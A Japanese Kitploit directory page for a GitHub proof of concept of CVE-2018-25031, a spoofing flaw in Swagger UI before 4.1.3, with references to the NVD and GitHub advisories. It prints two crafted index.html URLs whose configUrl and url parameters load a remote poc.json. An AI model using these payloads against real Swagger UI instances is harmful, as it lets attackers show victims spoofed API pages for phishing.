Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-25031 — .jsonおよび.yamlファイルはCVE-2018-25031の悪用に使用されます | Kitploit
ツール/GitHubGitHub/afine-com/cve-2018-25031
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティAPIセキュリティ
GitHubafine-com/cve-2018-25031

CVE-2018-25031

.jsonおよび.yamlファイルはCVE-2018-25031の悪用に使用されます

リポジトリを見る
21111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-25031

説明:

Swagger UI 4.1.3 より前のバージョンでは、リモートの攻撃者がなりすまし攻撃を仕掛ける可能性があります。被害者に細工されたURLを開かせることで、攻撃者はこの脆弱性を悪用してリモートのOpenAPI定義を表示させることができます。


攻撃前のスクリーンショット:

PoC:

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

攻撃後のPoCスクリーンショット:

参照:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

Swagger UI 3.52.1 でテスト済み
ツールをダウンロード